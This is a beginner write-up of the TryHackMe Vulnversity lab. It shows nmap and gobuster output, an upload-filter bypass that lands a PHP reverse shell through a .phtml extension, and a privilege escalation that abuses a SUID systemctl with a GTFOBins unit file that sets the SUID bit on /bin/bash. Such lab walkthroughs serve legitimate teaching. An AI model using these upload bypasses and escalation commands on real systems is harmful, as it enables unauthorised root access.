Hello, today we’re doing Vulnversity from tryhackme.com , an easy machine aimed for beginners. It involved finding an upload form, then exploiting that poorly secured upload form to obtain a shell on the box. For privilege escalation we found out that there is a suid bit set on systemctl , checking gtfobins gives us a method on how to run commands as root.
# Nmap 7.91 scan initiated Mon Sep 13 22:32:58 2021 as: nmap -sC -sV -oN nmap/vulnversity 10.10.209.201 Nmap scan report for 10.10.209.201 Host is up (0.026s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA) | 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA) |_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 3128/tcp open http-proxy Squid http proxy 3.5.12 |_http-server-header: squid/3.5.12 |_http-title: ERROR: The requested URL could not be retrieved | http-vulners-regex: | /main.pl: |_ cpe:/a:squid-cache:squid:3.5.12 3333/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Vuln University Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s |_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: vulnuniversity | NetBIOS computer name: VULNUNIVERSITY\x00 | Domain name: \x00 | FQDN: vulnuniversity |_ System time: 2021-09-13T22:33:21-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-09-14T02:33:21 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Sep 13 22:33:34 2021 -- 1 IP address (1 host up) scanned in 36.66 seconds
6 ports open, we’ll start enumerating the ftp first then as we go we’ll enumerate each port
If anonymous login was enabled, nmap would have pointed that out, but tools may fail from time to time and I always like checking manually anyway.
Anonymous login wasn’t enabled and no public exploits are available for that version. Moving on…
Nothing to see here.. Moving on
WebServer - 3333
Nothing on the page is clickable, most likely a static page. Checking the source code..
Well, nothing.. Starting a gobuster with different extensions
Let’s check other things while gobuster is running.
Going to /robots.txt
404, but the server is disclosing which version of apache is the webserver running on. This would definitely be a finding on a pentest :)
Checking what gobuster’s doing
And we get a hit on /internal , let’s check that out.
Cool, let’s try uploading a php file
Trying to upload a php reverse shell from pentestmonkey
And we get “Extension not allowed” , but what if it doesn’t check for other extensions and just checks for .php? What if we try uploading a .phtml for example? Will that do the thing?
And hey, it says “Success”, now the question is where this file has been uploaded? Let’s try /internal/shell.phtml (also starting a netcat listener in the background)
Not here, but if we remember correctly, gobuster found an images directory.
Unfortunately, we don’t see our shell here, let’s try the root directory
Not here… Let’s take a step back and gobuster again what’s inside of /internal directory
And hey, we get a hit right away. Let’s go to /uploads
We’ve already started the listener in the background, let’s just click it and see if we get a shell back
We do, I have stabilized the shell, and read user.txt :)
Now, we are www-data which is a service account, how can we escalate our privileges to another user or even root? I’ve tried simple things like sudo -l and finding suid binaries with find
There is one thing that really stands out, and that is systemctl, you don’t usually see that having a suid bit set, let’s check it on gtfobins.github.io , maybe we can escalate our privileges with it.
Well, good news, let’s click on “SUID”
Let’s try escalating our privileges with it.
Adjusting it a bit, this is what we’re going to run
TF=$(mktemp).service echo '[Service] Type=oneshot ExecStart=/bin/sh -c "id > /tmp/output" [Install] WantedBy=multi-user.target' > $TF systemctl link $TF systemctl enable --now $TF
Let’s modify “ExecStart” in order to set a suid bit on /bin/bash
TF=$(mktemp).service echo '[Service] Type=oneshot ExecStart=/bin/sh -c "chmod +s /bin/bash" [Install] WantedBy=multi-user.target' > $TF systemctl link $TF systemctl enable --now $TF
Let’s try this
Well, that was it, an easy box, aimed for beginners. All I do when I write these write-ups is that I want to show you guys the methodology (if beginners are reading this), my thought process and all that stuff. Hope you’ve learned something new :)